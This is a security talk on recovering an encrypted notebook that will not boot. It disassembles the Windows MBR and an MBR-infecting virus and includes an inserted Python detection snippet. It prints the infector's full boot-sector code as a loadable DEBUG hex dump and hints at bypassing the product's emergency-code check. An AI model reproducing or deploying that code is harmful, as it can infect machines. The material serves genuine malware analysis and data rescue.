Data Rescue in A Different WAY: The Case of The Non-Bootable Notebook
The IT security expert was called in to help decrypt the hard drive of a non-booting notebook. After several failed attempts using their product knowledge of the full disk encryption software, they discovered malware on the notebook's master boot record that was preventing encryption and bootup. Examining the master boot record through reverse engineering revealed code for loading partitions and handling errors that provided insight into how to decrypt the hard drive's data.
DATA RESCUE IN A DIFFERENT WAY
The Case of the Non-bootable Notebook

Question of the presentation

Is having hacker talent useful when working as an IT security expert? Sure. You're getting three questions (Q1, Q2, Q3) during this presentation, and the guy who gives me a perfect answer to all of them gains a Belgian fruit beer. Please answer them following my presentation.

Case study: initialization

A company purchases some licences of a full disk encryption software in order to provide data confidentiality on VIP users' computers. Before the whole deployment they run a pilot. An external IT security consultant installs and configures the management application, creates a silent client installer and installs it on a VIP IT member's notebook. A few weeks later, after a reboot, an error message appears on the display of the notebook: "client is not installed". There is only a reboot button to click, and the VIP needs to access some data in decrypted format...

IT security expert

IT security expert with basic skills: learns/reads about cryptography, understands symmetric encryption, knows what AES means, can draw the conclusion that he needs the secret key to make a rescue successful.

IT security expert with product-specific knowledge: Knows the theoretical background of the application, e.g. data are stored in encrypted format on the hard disk and decryption happens only in random access memory when an application accesses them. Knows the structure of the software, e.g. a client installation set can be built using the management application; configuration data and secret keys are stored in a central database and a synchronization process sends them to a client. Installs and configures live systems: has experience in deployment, knows the pre-boot authentication process which precedes loading of the operating system.

IT security expert with product operation experience: Knows what to do in case of usual problems. For example: user forgets his password → recovery; user locks his account → recovery. Knows what to do in case of unusual but known problems. For example: virus infection without communication to central management and with Safe Mode boot forbidden → support decryption; corrupted operating system → decryption. Has ideas for solving unusual and undocumented problems. For example: data rescue from a hard disk that is partially encrypted but stores corrupted encryption information → careful decryption; boot process stops before pre-boot authentication → decryption.

Initial attempts

Idea I: decryption
We can make a backup of decrypted data.

Product-specific theoretical knowledge: if a client cannot boot from its hard disk, we need to use the Emergency disk to remove encryption.
Product-specific practical knowledge: how we can build an Emergency disk (two supported solutions: boot from floppy with FreeDOS or boot from CD with BartPE). We used floppy boot, plugging in a USB floppy drive in that case.

Authorization

After reboot an authorization process checks whether you have permission to use emergency functions. This process is very simple. A proprietary algorithm generates a unique code which depends on the current date. If you type the proper code you can use the desired functionality.
Product-specific theoretical knowledge: if you participate in the necessary course, you learn how you should use these functions and you can get a daily code for practice.
Product-specific practical knowledge: if you have an arbitrary daily code with a known date, you can save time since you don't need to request a current one, just apply a simple hack.

Authentication
We must authenticate before accessing encryption parameters.
Product-specific theoretical knowledge: there are two different authentication methods: local (hard disk) authentication, based on data located on the hard disk, and central authentication, based on configuration data located in the central database.
Product-specific practical knowledge: we know how we can save configuration data.

Local authentication attempt
Result: failed, we got an error message similar to the original one [... client is not installed].

Central authentication attempt

Step I: successful authentication using top admin credentials to log on to the central management interface.
Step II: saving configuration data of the client computer.
Problem I: the local IT member noted down a wrong password.
Problem II: the external IT security consultant had no notes, only wrong tips.
Conclusion: none of the known methods were useful.
Question: is it the end?

Idea II: please, please, please

A blonde gets on a bus in Budapest and asks the bus driver: "Will this bus take me to New York?" The bus driver shakes his head and says: "Of course not." Hearing this, the blonde smiles and twitters: "Please, please, please!"

Question to the manufacturer: is there any other (undocumented) way to decrypt data? English-to-English translation: is there any vulnerability in the application known by the manufacturer?
Result: failed, but we got 2 days to find a solution.

Idea III: minimal chance
If encryption didn't execute... One of my colleagues connected the hard disk to a notebook and booted from another disk.
Result: unexpected; the antivirus application found malware on the Master Boot Record (MBR) of the connected hard disk. Can you see the light at the end of the tunnel?

IT security expert with reverse engineering knowledge

Reverse engineering is one of the most important hacking capabilities. Reverse engineering is useful for anybody who likes to understand the exact operation of an application. Reverse engineering may be prohibited by software manufacturers, but malicious code rarely contains an EULA to forbid it.

Master Boot Record

Role of Master Boot Record
MBR = code + partition table
In the boot process the BIOS loads it into memory (at address 0000:7C00h) and gives control to it. Since the CPU operates in real mode in this phase, machine code executes with 16-bit registers instead of 32-bit ones. The primary purpose of this code is loading the Partition Boot Record (PBR) of the active partition into memory and giving control to it.

Windows MBR

Memory copy routine

0000:7C00 33C0       XOR AX,AX            ; AX=0000
0000:7C02 8ED0       MOV SS,AX            ; SS=0000
0000:7C04 BC007C     MOV SP,7C00          ; SP=7C00
0000:7C07 FB         STI
0000:7C08 50         PUSH AX
0000:7C09 07         POP ES               ; ES=0000
0000:7C0A 50         PUSH AX
0000:7C0B 1F         POP DS               ; DS=0000
0000:7C0C FC         CLD
0000:7C0D BE1B7C     MOV SI,7C1B          ; SI=7C1B
0000:7C10 BF1B06     MOV DI,061B          ; DI=061B
0000:7C13 50         PUSH AX              ; pushes 0000
0000:7C14 57         PUSH DI              ; pushes 061B
0000:7C15 B9E501     MOV CX,01E5          ; CX=01E5
0000:7C18 F3         REPZ
0000:7C19 A4         MOVSB                ; 0:[061B-07FF]=0:[7C1B-7DFF]
0000:7C1A CB         RETF                 ; jumps to 0:061B

Active partition search

0000:061B BDBE07     MOV BP,07BE          ; 07BE = start of partition table
0000:061E B104       MOV CL,04            ; 04 = number of partition entries
0000:0620 386E00     CMP [BP+00],CH       ; first byte = partition status
0000:0623 7C09       JL 062E              ; jumps if less than 0 (0 = inactive; 80, 81 etc. = active)
0000:0625 7513       JNZ 063A             ; status is neither 0 nor negative (01..7F): invalid table, jumps to error handling
0000:0627 83C510     ADD BP,+10           ; BP points to next entry
0000:062A E2F4       LOOP 0620            ; jumps to check next partition status
0000:062C CD18       INT 18               ; in case of 4 inactive partitions: "Press a key to reboot"
0000:062E 8BF5       MOV SI,BP            ; SI points to current entry
0000:0630 83C610     ADD SI,+10           ; SI points to next entry
0000:0633 49         DEC CX               ; CX--
0000:0634 7419       JZ 064F              ; was it the last partition entry?
0000:0636 382C       CMP [SI],CH          ; checks next partition status
0000:0638 74F6       JZ 0630

Error handling

0000:063A A0B507     MOV AL,[07B5]
0000:063D B407       MOV AH,07            ; AX points to the "Invalid partition table" message
0000:063F 8BF0       MOV SI,AX            ; SI=AX
0000:0641 AC         LODSB                ; AL contains the next character of the error message
0000:0642 3C00       CMP AL,00
0000:0644 74FC       JZ 0642              ; if AL contains the terminator byte: infinite loop
0000:0646 BB0700     MOV BX,0007
0000:0649 B40E       MOV AH,0E
0000:064B CD10       INT 10               ; writes the character to the screen
0000:064D EBF2       JMP 0641             ; jumps to read the next character

Location check

0000:064F 884E10     MOV [BP+10],CL
0000:0652 E84600     CALL 069B
...
0000:069B BF0500     MOV DI,0005          ; DI=0005
0000:069E 8A5600     MOV DL,[BP+00]       ; DL=drive number
0000:06A1 B408       MOV AH,08
0000:06A3 CD13       INT 13               ; reads drive parameters
0000:06A5 7223       JB 06CA              ; jumps on error
[Code calculates number of sectors on the partition based on CHS]  ; result is in DX:AX
0000:06BE 39560A     CMP [BP+0A],DX
0000:06C1 7723       JA 06E6              ; jumps if first sector position too big
0000:06C3 7205       JB 06CA
0000:06C5 394608     CMP [BP+08],AX
0000:06C8 731C       JNB 06E6             ; jumps if first sector position too big

Calculation

; CHS means Cylinder-Head-Sector, an old BIOS addressing mode which has an 8 GB address space limit
0000:06A7 8AC1       MOV AL,CL
0000:06A9 243F       AND AL,3F            ; AL=number of sectors per track
0000:06AB 98         CBW
0000:06AC 8ADE       MOV BL,DH            ; BL=number of heads - 1
0000:06AE 8AFC       MOV BH,AH            ; BH=00
0000:06B0 43         INC BX               ; BX=number of heads
0000:06B1 F7E3       MUL BX               ; DX:AX=No of heads * sectors per track = sectors per cylinder
0000:06B3 8BD1       MOV DX,CX
0000:06B5 86D6       XCHG DL,DH
0000:06B7 B106       MOV CL,06
0000:06B9 D2EE       SHR DH,CL
0000:06BB 42         INC DX               ; DX=number of cylinders
0000:06BC F7E2       MUL DX               ; DX:AX=No of total sectors

Reading active PBR without LBA support

0000:06CA B80102     MOV AX,0201          ; AX=0201
0000:06CD BB007C     MOV BX,7C00          ; BX=7C00
0000:06D0 8B4E02     MOV CX,[BP+02]
0000:06D3 8B5600     MOV DX,[BP+00]
0000:06D6 CD13       INT 13               ; reads 1st sector
0000:06D8 7351       JNB 072B             ; jumps if no error
0000:06DA 4F         DEC DI               ; DI--
0000:06DB 744E       JZ 072B
0000:06DD 32E4       XOR AH,AH            ; AH=00
0000:06DF 8A5600     MOV DL,[BP+00]
0000:06E2 CD13       INT 13               ; resets drive
0000:06E4 EBE4       JMP 06CA             ; try again!
...
0000:072B C3         RET

Reading active PBR with LBA support

0000:06E6 8A5600     MOV DL,[BP+00]
0000:06E9 60         PUSHA
0000:06EA BBAA55     MOV BX,55AA
0000:06ED B441       MOV AH,41
0000:06EF CD13       INT 13
0000:06F1 7236       JB 0729
0000:06F3 81FB55AA   CMP BX,AA55
0000:06F7 7530       JNZ 0729
0000:06F9 F6C101     TEST CL,01
0000:06FC 742B       JZ 0729
0000:06FE 61         POPA
0000:06FF 60         PUSHA
0000:0700 6A00       PUSH 00
0000:0702 6A00       PUSH 00
0000:0704 FF760A     PUSH [BP+0A]
0000:0707 FF7608     PUSH [BP+08]
0000:070A 6A00       PUSH 00
0000:070C 68007C     PUSH 7C00
0000:070F 6A01       PUSH 01
0000:0711 6A10       PUSH 10
0000:0713 B442       MOV AH,42
0000:0715 8BF4       MOV SI,SP
0000:0717 CD13       INT 13
0000:0719 61         POPA
0000:071A 61         POPA
0000:071B 730E       JNB 072B
0000:071D 4F         DEC DI
0000:071E 740B       JZ 072B
0000:0720 32E4       XOR AH,AH
0000:0722 8A5600     MOV DL,[BP+00]
0000:0725 CD13       INT 13
0000:0727 EBD6       JMP 06FF
0000:0729 61         POPA
0000:072A F9         STC
0000:072B C3         RET

If read operation fails...

0000:0655 732A       JNB 0681             ; jumps if PBR is OK
0000:0657 FE4610     INC BYTE PTR [BP+10] ; [BP+10]=01
0000:065A 807E040B   CMP BYTE PTR [BP+04],0B
0000:065E 740B       JZ 066B              ; jumps if FAT32
0000:0660 807E040C   CMP BYTE PTR [BP+04],0C
0000:0664 7405       JZ 066B              ; jumps if FAT32 LBA
0000:0666 A0B607     MOV AL,[07B6]        ; "Error loading operating system"
0000:0669 75D2       JNZ 063D

Q1: What's the purpose of this code?

0000:066B 80460206   ADD BYTE PTR [BP+02],06
0000:066F 83460806   ADD WORD PTR [BP+08],+06
0000:0673 83560A00   ADC WORD PTR [BP+0A],+00
0000:0677 E82100     CALL 069B            ; try again!
0000:067A 7305       JNB 0681             ; jumps if PBR is OK
0000:067C A0B607     MOV AL,[07B6]        ; "Error loading operating system"
0000:067F EBBC       JMP 063D

PBR check and giving control

0000:0681 813EFE7D55AA CMP WORD PTR [7DFE],AA55
0000:0687 740B       JZ 0694              ; jumps if magic number OK
0000:0689 807E1000   CMP BYTE PTR [BP+10],00
0000:068D 74C8       JZ 0657              ; jumps if first probe
0000:068F A0B707     MOV AL,[07B7]        ; "Missing operating system"
0000:0692 EBA9       JMP 063D
0000:0694 8BFC       MOV DI,SP            ; DI=SP=7C00
0000:0696 1E         PUSH DS              ; pushes 0000
0000:0697 57         PUSH DI              ; pushes 7C00
0000:0698 8BF5       MOV SI,BP            ; SI=BP
0000:069A CB         RETF                 ; jumps to PBR

Reverse engineering malware

My first meeting with a computer virus

1994: I bought a hard disk and got an additional test application which was infected by Backform.2000.A (2000 is the length of that virus code). When I realized the infection, I disassembled the code, printed it using the print screen function, then I took the computer back for disinfection. My first reverse engineering task took 2 days.

Infected MBR

Q2: Which application can use the content below as input?
e 7c00 FA 33 DB 8E D3 36 89 26 FE 7B BC FE 7B 1E 66 60
e 7c10 FC 8E DB BE 13 04 83 2C 02 AD C1 E0 06 8E C0 BE
e 7c20 00 7C 33 FF B9 00 01 F3 A5 B8 02 02 B1 3D BA 80
e 7c30 00 8B DF CD 13 33 DB 90 90 90 90 66 8B 47 4C C7
e 7c40 47 4C 6A 00 66 26 A3 77 00 8C 47 4E 06 68 51 00
e 7c50 CB FB 8E C3 B8 01 02 B9 3F 00 BA 80 00 B7 7C CD
e 7c60 13 66 61 1F 5C EA 00 7C 00 00 9C 80 FC 42 74 0B
e 7c70 80 FC 02 74 06 9D EA 00 00 00 00 2E 88 26 94 00
e 7c80 9D 9C 2E FF 1E 77 00 0F 82 9E 00 9C FA 06 66 60
e 7c90 FC B4 00 B5 00 80 FD 42 75 04 AD AD C4 1C 85 C0
e 7ca0 75 01 40 8B C8 C1 E1 09 B0 8B 8B FB 60 F2 AE 75
e 7cb0 48 90 66 26 81 3D F0 85 F6 74 75 F1 26 81 7D 05
e 7cc0 80 3D 75 E9 26 8A 45 04 3C 21 74 04 3C 22 75 DD
e 7cd0 BE 0B 02 2E 80 3C 00 75 20 2E 88 04 26 C7 45 FF
e 7ce0 FF 15 66 8C C8 66 C1 E0 04 05 00 02 66 2E A3 FC
e 7cf0 01 2D 04 00 66 26 89 45 01 61 B0 83 F2 AE 75 25
e 7d00 66 26 81 3D C4 02 E9 00 75 F2 66 26 81 7D 04 00
e 7d10 E9 FD FF 75 E7 66 26 C7 45 FC 90 90 90 83 26 83
e 7d20 65 06 00 EB D7 66 61 07 9D CA 02 00
u 7c00 7d2b
q

Memory copy routine

0000:7C00 FA         CLI
0000:7C01 33DB       XOR BX,BX            ; BX=0000
0000:7C03 8ED3       MOV SS,BX            ; SS=0000
0000:7C05 36         SS:
0000:7C06 8926FE7B   MOV [7BFE],SP
0000:7C0A BCFE7B     MOV SP,7BFE          ; SP=7BFE
0000:7C0D 1E         PUSH DS
0000:7C0E 6660       PUSHAD
0000:7C10 FC         CLD
0000:7C11 8EDB       MOV DS,BX            ; DS=0000
0000:7C13 BE1304     MOV SI,0413          ; SI=0413 (BIOS base memory size in KB)
0000:7C16 832C02     SUB WORD PTR [SI],+02 ; reduces RAMTOP by 2 KB
0000:7C19 AD         LODSW                ; reads new RAMTOP
0000:7C1A C1E006     SHL AX,06            ; *2^6 = *2^10/2^4: KB to bytes, bytes/16 = segment
0000:7C1D 8EC0       MOV ES,AX            ; ES=segment address of new RAMTOP
0000:7C1F BE007C     MOV SI,7C00          ; SI=7C00
0000:7C22 33FF       XOR DI,DI            ; DI=0000
0000:7C24 B90001     MOV CX,0100          ; CX=0100
0000:7C27 F3         REPZ
0000:7C28 A5         MOVSW                ; copies 512 bytes to new RAMTOP

Reading additional sectors

0000:7C29 B80202     MOV AX,0202
0000:7C2C B13D       MOV CL,3D
0000:7C2E BA8000     MOV DX,0080
0000:7C31 8BDF       MOV BX,DI
0000:7C33 CD13       INT 13               ; reads 2 sectors into memory right after the previously copied 512 bytes

Interrupt hooking

0000:7C35 33DB       XOR BX,BX            ; BX=0000
0000:7C37 90         NOP
0000:7C38 90         NOP
0000:7C39 90         NOP
0000:7C3A 90         NOP
0000:7C3B 668B474C   MOV EAX,[BX+4C]      ; original address of INT 13h
0000:7C3F C7474C6A00 MOV WORD PTR [BX+4C],006A ; new offset
0000:7C44 6626A37700 MOV ES:[0077],EAX    ; stores the original address
0000:7C49 8C474E     MOV [BX+4E],ES       ; new segment address
0000:7C4C 06         PUSH ES
0000:7C4D 685100     PUSH 0051
0000:7C50 CB         RETF                 ; jumps to RAMTOP:0051

Interesting load operation

9F80:0051 FB         STI
9F80:0052 8EC3       MOV ES,BX            ; ES=0000
9F80:0054 B80102     MOV AX,0201
9F80:0057 B93F00     MOV CX,003F
9F80:005A BA8000     MOV DX,0080
9F80:005D B77C       MOV BH,7C
9F80:005F CD13       INT 13               ; reads 1 sector, but what is it?
9F80:0061 6661       POPAD
9F80:0063 1F         POP DS
9F80:0064 5C         POP SP
9F80:0065 EA007C0000 JMP 0000:7C00        ; gives control to the memory position that holds the just-loaded sector; the address is the typical location of MBR code in memory
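The partition-status rules of the Windows MBR code at 061B, the AA55 magic check, and the two traits of the infected MBR above (RAMTOP decrement at 0040:0013, INT 13h vector rewrite) in one Python example; it is added here and is not code from the presentation. The sample sectors are constructed, the byte patterns are a heuristic for this infector rather than a general bootkit signature, and treating a sector-63 copy with the same partition table as the original MBR is an assumption drawn from the final fix of the case.

```python
import struct
SECTOR = 512
PTABLE_OFF, SIG_OFF = 0x1BE, 0x1FE   # partition table and AA55 magic inside the sector
# Byte patterns lifted from the listings above (a heuristic for this infector, not a general one)
WIN_PROLOGUE  = bytes.fromhex("33C08ED0BC007C")  # XOR AX,AX / MOV SS,AX / MOV SP,7C00
RAMTOP_DEC    = bytes.fromhex("BE1304832C02")    # MOV SI,0413 / SUB WORD PTR [SI],+02
INT13_REWRITE = bytes.fromhex("C7474C")          # MOV WORD PTR [BX+4C],imm16 (BX=0)

def parse_partitions(sector):
    """Walk the 4 entries as the code at 061B-0638 does: status 0 = inactive,
    negative (80h..FFh) = active, anything else = "Invalid partition table"."""
    entries, active = [], None
    for i in range(4):
        e = sector[PTABLE_OFF + 16 * i: PTABLE_OFF + 16 * (i + 1)]
        lba_start, n_sectors = struct.unpack_from("<II", e, 8)
        if e[0] == 0:
            kind = "inactive"
        elif e[0] >= 0x80:               # JL 062E: signed compare against CH=0
            kind = "active"
        else:                            # JNZ 063A: error handling
            raise ValueError("Invalid partition table")
        entries.append((kind, e[4], lba_start, n_sectors))   # e[4] = partition type
        if kind == "active" and active is None:
            active = i
    return entries, active

def analyse_mbr(sector):
    """Return findings for one sector image; an empty list means nothing suspicious."""
    findings = []
    if len(sector) != SECTOR or sector[SIG_OFF:SIG_OFF + 2] != b"\x55\xAA":
        findings.append("missing AA55 signature")
    if not sector.startswith(WIN_PROLOGUE):
        findings.append("code does not begin with the Windows MBR prologue")
    if RAMTOP_DEC in sector:
        findings.append("RAMTOP at 0040:0013 decremented (code hides above RAM top)")
    if INT13_REWRITE in sector:
        findings.append("INT 13h vector at 0000:004C rewritten")
    return findings

def looks_like_original(sector0, sector63):
    """Sector 63 is a credible copy of the original MBR if it carries the AA55 magic, the
    Windows prologue and sector 0's partition table (assumption: the infector kept the table)."""
    return (sector63[SIG_OFF:] == b"\x55\xAA" and sector63.startswith(WIN_PROLOGUE)
            and sector63[PTABLE_OFF:SIG_OFF] == sector0[PTABLE_OFF:SIG_OFF])

# Constructed sample sectors (not the page's dumps): one clean, one with the infector's traits
_TABLE = struct.pack("<BBHBBHII", 0x80, 1, 1, 0x07, 0xFE, 0xFFFF, 63, 0x1000) + bytes(48)
CLEAN = WIN_PROLOGUE + bytes(PTABLE_OFF - len(WIN_PROLOGUE)) + _TABLE + b"\x55\xAA"
_BAD = bytes.fromhex("FA33DB8ED3") + RAMTOP_DEC + INT13_REWRITE + b"\x6A\x00"
INFECTED = _BAD + bytes(PTABLE_OFF - len(_BAD)) + _TABLE + b"\x55\xAA"
```

Run `analyse_mbr` over sector 0 of a disk image and `looks_like_original` over sectors 0 and 63 to reproduce the two checks the case turned on.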
Q3: What happened earlier (during client install and MBR infection)?

Final solution

How could we solve the original problem? We copied the content of sector 3Fh (63) to sector 0 and rebooted the notebook.

Péter Gara-Tarnóczi (CISSP, GCIH, GCFW)